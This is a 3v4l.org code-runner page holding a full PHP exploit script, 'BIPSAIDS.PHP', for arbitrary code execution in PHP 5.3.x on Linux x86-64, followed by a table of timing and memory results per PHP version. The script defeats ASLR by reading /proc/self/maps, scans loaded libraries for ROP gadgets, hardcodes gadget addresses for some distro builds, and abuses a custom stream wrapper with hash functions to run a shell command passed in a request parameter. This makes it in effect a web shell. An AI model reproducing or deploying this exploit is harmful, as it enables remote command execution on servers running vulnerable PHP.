3v4l.org

run code in 300+ PHP versions simultaneously
<?php /* * BIPSAIDS.PHP -- by blasty <blasty@fail0verflow.com> * * PHP 5.3.x Linux x86-64 arbitrary code execution * * based on : MOPS-2010-001 (yes, bugs from 2010 live in <s>2011</s> 2012) * * NOTES: * Most distro's ship with PIE compiled httpd's these days, and everyone * seems to favour php5 as module rather than using php-cgi. This puts us * in an annoying position for doing Return-oriented-whatever. * * So the bad news is this exploit only works without restrictions against * machines that use php5-cgi and where gadgets have already been identified. * * However, the good news is if PHP doesn't enforce open_basedir restrictions * there's still a fat chance this exploit will succeed by parsing /proc/self/maps * to circumvent ASLR and identify gadgets during runtime by scanning libraries. * */ error_reporting(E_ALL); if (!isset($_REQUEST['x']) && !isset($argv[1])) die("gimme something to dance for\n"); $CMD = (isset($_REQUEST['x'])) ? $_REQUEST['x'] : $argv[1]; function ustruct($fmt, $data) { $out = array(); $pos = 0; $upack = array('u16'=>'S','u32'=>'V','u64'=>'V2'); $sizes = array('u16'=> 2 ,'u32'=> 4 ,'u64'=> 8 ); foreach($fmt as $name => $type) { $v = unpack($upack[$type], substr($data, $pos, $sizes[$type])); if ($type == 'u64') $v = ($v[2] << 32) | $v[1]; else $v = $v[1]; $out[$name] = $v; $pos += $sizes[$type]; } return $out; } function get_sections($filename) { $elf64_header = array( 'e_ident0' => 'u64', 'e_ident1' => 'u64', 'type' => 'u16', 'machine' => 'u16', 'version' => 'u32', 'entry' => 'u64', 'phoff' => 'u64', 'shoff' => 'u64', 'flags' => 'u32', 'ehsize' => 'u16', 'phentsize' => 'u16', 'phnum' => 'u16', 'shentsize' => 'u16', 'shnum' => 'u16', 'shstrndx' => 'u16' ); $elf64_sh = array( 'name' => 'u32', 'type' => 'u32', 'flags' => 'u64', 'addr' => 'u64', 'offset' => 'u64', 'size' => 'u64', 'link' => 'u32', 'info' => 'u32', 'align' => 'u64', 'entsize'=> 'u64' ); $buf = file_get_contents($filename); $hdr = ustruct($elf64_header, substr($buf, 0, 0x40)); echo "[>>] $filename\n"; $sections = array(); for($i = 0; $i < $hdr['shnum']; $i++) { $data = substr($buf, $hdr['shoff'] + ($i * $hdr['shentsize']), $hdr['shentsize']); $sections[] = ustruct($elf64_sh, $data); } $str_section = $sections[ $hdr['shstrndx'] ]; $ret_sections = array(); for($i = 0; $i < count($sections); $i++) { if (!($sections[$i]['flags']&4)) continue; $v = explode("\x00", substr($buf, $str_section['offset'] + $sections[$i]['name']) ); $sections[$i]['str'] = $v[0]; $sections[$i]['data'] = substr($buf, $sections[$i]['offset'], $sections[$i]['size']); $ret_sections[] = $sections[$i]; } return $ret_sections; } function find_gadgets($gg, $data, $base=0) { $ret = array(); foreach($gg as $name => $patterns) { if (!is_array($patterns)) $patterns = array($patterns); foreach($patterns as $pattern) { if (($pos = strpos($data, $pattern)) !== false) { $ret[$name] = $base+$pos; } } } return $ret; } function w64($v) { return pack("V", $v & 0xffffffff) . pack("V", $v >> 32); } $resolve = true; if ( ((isset($_SERVER['ORIG_SCRIPT_NAME']) && strstr($_SERVER['ORIG_SCRIPT_NAME'], "cgi") !== false) || (isset($_SERVER['ORIG_SCRIPT_FILENAME']) && strstr($_SERVER['ORIG_SCRIPT_FILENAME'], "cgi") !== false)) ) { $resolve = false; $cgirop = array( "5.3.2-1ubuntu4.10" => array(0x42c1b8, 0x42fd31, 0x42c59d, 0x65ca2b, 0x5f0758, 0x53c720, 0xd6a830, 0x096a20), "5.3.5-1ubuntu7.3" => array(0x429d4f, 0x42f3e1, 0x428c26, 0x50b22d, 0x5f0758, 0x6b1730, 0xdae7d0, 0x095260), "5.3.3-7+squeeze3" => array(0x42d478, 0x4310c1, 0x42d85d, 0x648bdb, 0x5dc538, 0x527600, 0xd5b810, 0x084970), //"5.3.8" /* ARCH */ => array(0x42544c, 0x4294ba, 0x42460b, 0x428f57, 0x427859, 0x423476, ); $v = phpversion(); if (!isset($cgirop[$v])) { echo "plz2portgadgets: ".$v."\nattempting fallback!\n"; $resolve = true; } else $addy = $cgirop[$v]; } if (!isset($addy)) { $patterns = array( 'ADDRSP' => "\x48\x83\xc4\x28\xc3", 'POPRAX' => "\x58\xc3", 'LEACALL' => array( "\x48\x8d\x7c\x24\x10\xff\xd0", "\x48\x8d\x7c\x24\x18\xff\xe0" ), 'SYSTEM' => "\x53\x48\x83\xec\x10\x48\x85\xff\x74\x16" ); $maps = explode("\n", file_get_contents("/proc/self/maps") ); $gadgets = array(); foreach($maps as $map) { $map = explode(" ", preg_replace('!\s+!', ' ', $map)); if (count($map)<2 || !strstr($map[1], "x") || $map[5][0] == '[') continue; if (count($patterns) == 1 && !strstr($map[5], "libc")) continue; $exec_sections = get_sections($map[5]); $tmp = explode("-", $map[0]); $page_offs = hexdec($tmp[0]); foreach($exec_sections as $section) { $new_gadgets = find_gadgets( $patterns, $section['data'], $section['offset'] ); foreach($new_gadgets as $name => $offs) { if (isset($patterns[$name])) { printf(" `- found gadget '%s' in [%s -> %s] @ 0x%x\n", $name, $map[5], $section['str'], $page_offs+$offs); unset($patterns[$name]); $new_gadgets[$name] += $page_offs; } } if (count($new_gadgets) > 0) $gadgets = array_merge($gadgets, $new_gadgets); if (count($patterns) == 0) { echo "!!! ALL GADGETS FOUND, LETS-A-GO !!!\n"; break 2; } } } $addy = $gadgets; } if (isset($gadgets)) { $ropvar = array('ADDRSP','POPRAX','LEACALL','SYSTEM'); for($i = 0; $i < count($ropvar); $i++) { printf("setting %s to 0x%x\n", $ropvar[$i], $addy[ $ropvar[$i] ]); $$ropvar[$i] = w64($addy[ $ropvar[$i] ]); } } else { $ropvar = array('ADDRSP','POPRAX','POPRDI','DEREFRAX','SUBRDIRAX','LEACALL','GOTENTRY','LIBCDELTA'); for($i = 0; $i < count($ropvar); $i++) { printf("setting %s to 0x%x\n", $ropvar[$i], $addy[ $i ]); $$ropvar[$i] = w64($addy[ $i ]); } } if (!isset($addy) || count($addy) != count($ropvar)) die("looks like this tech isn't compatible with your box.\n"); class evil_stream { function stream_open($a, $b, $c, &$e) { return 1; } function stream_eof() { return 0; } function stream_seek($offset, $whence) { return 0; } function stream_read($count) { global $ADDRSP, $POPRAX, $GOTENTRY, $DEREFRAX, $POPRDI, $LIBCDELTA, $SUBRDIRAX, $LEACALL, $CMD, $SYSTEM; hash_final($GLOBALS['hid'], false); $GLOBALS['a'] = str_repeat($ADDRSP, 3); // add 40, rsp if (isset($SYSTEM) && !empty($SYSTEM)) return $POPRAX . $SYSTEM . $LEACALL . str_repeat("Z", 0x58) . "WOOP ; " . $CMD . "\x00"; else return $POPRAX . $GOTENTRY . $DEREFRAX . $POPRDI . $LIBCDELTA . $SUBRDIRAX . $LEACALL . str_repeat("Z", 0x58) . "WOOP ; " . $CMD . " ; echo lol\x00"; } } stream_wrapper_register("evil", "evil_stream") || die("oh snap :(\n"); $hid = hash_init('md5'); hash_update_file($hid, "evil://code"); echo "you goofed up\n"; ?>

Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).

VersionSystem time (s)User time (s)Memory (MiB)
7.2.120.0090.00816.54
7.2.110.0100.00516.71
7.2.100.0120.00316.39
7.2.90.0100.00416.62
7.2.80.0090.00516.48
7.2.70.0100.00816.86
7.2.60.0080.00716.90
7.2.50.0100.00616.74
7.2.40.0080.00916.74
7.2.30.0070.01016.72
7.2.20.0100.00716.83
7.2.10.0100.00516.78
7.2.00.0080.00816.72
7.1.240.0060.01015.43
7.1.230.0080.00815.74
7.1.220.0050.00915.64
7.1.210.0110.00315.60
7.1.200.0080.00615.48
7.1.190.0060.01015.52
7.1.180.0100.00415.54
7.1.170.0060.00815.52
7.1.160.0060.00715.48
7.1.150.0080.00715.60
7.1.140.0070.00715.71
7.1.130.0080.00715.83
7.1.120.0080.00515.51
7.1.110.0100.00615.45
7.1.100.0060.00915.56
7.1.90.0060.01015.46
7.1.80.0040.00915.63
7.1.70.0070.00716.04
7.1.60.0070.00616.02
7.1.50.0050.00816.11
7.1.40.0030.01115.45
7.1.30.0110.00615.42
7.1.20.0070.00815.49
7.1.10.0100.00515.70
7.1.00.0050.03117.83
7.0.320.0060.00915.24
7.0.310.0170.00715.31
7.0.300.0100.01115.51
7.0.290.0130.00815.22
7.0.280.0160.00415.42
7.0.270.0130.00715.38
7.0.260.0090.01115.27
7.0.250.0170.00315.32
7.0.240.0170.00415.34
7.0.230.0100.01015.18
7.0.220.0040.01715.39
7.0.210.0160.00615.19
7.0.200.0100.00915.73
7.0.190.0080.01415.40
7.0.180.0350.00515.31
7.0.170.0130.00615.39
7.0.160.0160.00415.24
7.0.150.0090.01115.33
7.0.140.0100.03017.51
7.0.130.0170.00215.41
7.0.120.0150.00415.25
7.0.110.0070.01315.32
7.0.100.0100.02216.92
7.0.90.0170.01316.83
7.0.80.0060.02016.88
7.0.70.0120.02116.93
7.0.60.0140.01716.95
7.0.50.0170.02516.90
7.0.40.0110.02016.94
7.0.30.0130.03116.98
7.0.20.0090.03616.86
7.0.10.0150.03316.98
7.0.00.0120.02716.98
5.6.380.0130.00314.14
5.6.370.0160.00514.36
5.6.360.0170.00414.46
5.6.350.0130.00914.44
5.6.340.0160.00714.38
5.6.330.0140.00614.31
5.6.320.0140.00714.70
5.6.310.0170.00514.47
5.6.300.0150.00614.55
5.6.290.0070.01514.29
5.6.280.0120.02916.70
5.6.270.0090.01214.47
5.6.260.0090.01314.46
5.6.250.0090.02016.53
5.6.240.0100.02116.50
5.6.230.0100.01916.52
5.6.220.0100.02716.52
5.6.210.0080.02116.52
5.6.200.0090.03416.64
5.6.190.0180.01816.61
5.6.180.0140.02816.61
5.6.170.0090.03516.58
5.6.160.0130.02616.57
5.6.150.0140.02816.71
5.6.140.0120.03416.70
5.6.130.0120.03216.73
5.6.120.0050.04016.58
5.6.110.0070.03716.60
5.6.100.0110.02216.55
5.6.90.0090.03516.50
5.6.80.0120.02916.39
5.6.70.0080.03716.34
5.6.60.0090.03516.29
5.6.50.0150.02716.19
5.6.40.0130.02916.24
5.6.30.0100.03116.51
5.6.20.0070.03716.30
5.6.10.0130.02616.21
5.6.00.0110.03216.29
5.5.380.0110.01514.13
5.5.370.0070.02014.37
5.5.360.0110.01514.20
5.5.350.0080.02214.15
5.5.340.0110.03014.48
5.5.330.0090.02614.47
5.5.320.0090.03214.38
5.5.310.0100.02914.31
5.5.300.0090.02914.28
5.5.290.0080.02914.19
5.5.280.0100.02114.45
5.5.270.0100.02614.50
5.5.260.0090.03114.38
5.5.250.0080.02914.30
5.5.240.0050.03314.12
5.5.230.0130.03114.08
5.5.220.0140.02514.13
5.5.210.0110.02714.24
5.5.200.0140.02414.24
5.5.190.0110.02814.16
5.5.180.0090.02914.04
5.5.170.0170.00514.29
5.5.160.0100.02714.26
5.5.150.0100.03014.08
5.5.140.0050.03314.03
5.5.130.0080.03014.17
5.5.120.0090.02914.21
5.5.110.0160.01813.98
5.5.100.0080.03114.18
5.5.90.0100.02913.99
5.5.80.0130.01914.15
5.5.70.0080.01914.06
5.5.60.0130.01714.16
5.5.50.0100.02814.03
5.5.40.0100.02914.20
5.5.30.0080.03413.97
5.5.20.0090.03114.22
5.5.10.0120.02314.09
5.5.00.0060.02814.05
5.4.450.0070.03213.81
5.4.440.0120.02713.81
5.4.430.0100.02413.93
5.4.420.0120.02813.73
5.4.410.0070.03013.74
5.4.400.0110.02513.68
5.4.390.0090.03113.65
5.4.380.0080.03013.75
5.4.370.0060.03013.75
5.4.360.0080.03213.59
5.4.350.0070.02613.78
5.4.340.0100.02713.55
5.4.330.0090.00811.00
5.4.320.0100.02913.67
5.4.310.0030.03313.75
5.4.300.0090.02713.74
5.4.290.0100.03013.70
5.4.280.0100.02813.73
5.4.270.0120.02613.61
5.4.260.0110.02613.66
5.4.250.0070.02913.78
5.4.240.0070.02613.71
5.4.230.0130.02213.67
5.4.220.0120.02613.64
5.4.210.0110.02713.66
5.4.200.0080.02813.60
5.4.190.0090.02613.77
5.4.180.0060.03113.72
5.4.170.0110.01713.72
5.4.160.0070.02713.52
5.4.150.0110.02713.71
5.4.140.0040.02612.81
5.4.130.0140.02212.83
5.4.120.0050.03212.89
5.4.110.0090.03013.05
5.4.100.0080.03012.85
5.4.90.0090.01712.81
5.4.80.0100.01612.89
5.4.70.0070.02812.88
5.4.60.0100.02712.84
5.4.50.0080.03112.65
5.4.40.0120.02412.78
5.4.30.0080.03112.85
5.4.20.0080.02812.89
5.4.10.0130.02212.90
5.4.00.0100.02912.65
5.3.290.0120.01912.08
5.3.280.0070.03011.94
5.3.270.0120.02611.94
5.3.260.0140.01911.86
5.3.250.0070.03011.98
5.3.240.0110.02811.91
5.3.230.0070.02911.95
5.3.220.0090.02711.86
5.3.210.0080.02911.87
5.3.200.0070.03011.96
5.3.190.0100.01811.98
5.3.180.0070.01711.97
5.3.170.0090.02612.04
5.3.160.0030.03012.06
5.3.150.0100.01911.93
5.3.140.0080.02811.95
5.3.130.0080.02512.01
5.3.120.0090.01911.98
5.3.110.0090.01711.99
5.3.100.0070.02011.79
5.3.90.0090.02711.77
5.3.80.0080.02111.72
5.3.70.0100.02611.64
5.3.60.0090.02611.82
5.3.50.0070.02311.69
5.3.40.0090.03111.71
5.3.30.0060.03511.72
5.3.20.0050.03011.70
5.3.10.0070.02811.45
5.3.00.0090.03011.48
5.2.170.0060.0069.48
5.2.160.0090.0049.50
5.2.150.0020.0099.45
5.2.140.0080.0059.35
5.2.130.0040.0079.58
5.2.120.0090.0029.62
5.2.110.0050.0069.48
5.2.100.0060.0059.48
5.2.90.0080.0049.61
5.2.80.0080.0049.37
5.2.70.0020.0109.55
5.2.60.0050.0069.26
5.2.50.0070.0049.39
5.2.40.0050.0089.52
5.2.30.0070.0069.47
5.2.20.0040.0089.32
5.2.10.0060.0079.31
5.2.00.0100.0039.19
5.1.60.0080.0029.01
5.1.50.0100.0009.01
5.1.40.0090.0019.01
5.1.30.0070.0049.01
5.1.20.0090.0029.01
5.1.10.0020.0099.01
5.1.00.0030.0069.01
5.0.50.0050.0059.01
5.0.40.0090.0009.01
5.0.30.0050.0049.01
5.0.20.0020.0089.01
5.0.10.0040.0049.01
5.0.00.0030.0049.01
4.4.90.0020.0059.01
4.4.80.0020.0069.01
4.4.70.0020.0069.01
4.4.60.0030.0059.01
4.4.50.0040.0039.01
4.4.40.0050.0029.01
4.4.30.0060.0029.01
4.4.20.0050.0039.01
4.4.10.0060.0029.01
4.4.00.0060.0019.01
4.3.110.0030.0039.01
4.3.100.0070.0019.01
4.3.90.0040.0039.01
4.3.80.0030.0049.01
4.3.70.0040.0039.01
4.3.60.0030.0049.01
4.3.50.0030.0049.01
4.3.40.0000.0089.01
4.3.30.0050.0029.01
4.3.20.0040.0029.01
4.3.10.0020.0049.01
4.3.00.0020.0059.01
preferences:
41.39 ms | 401 KiB | 5 Q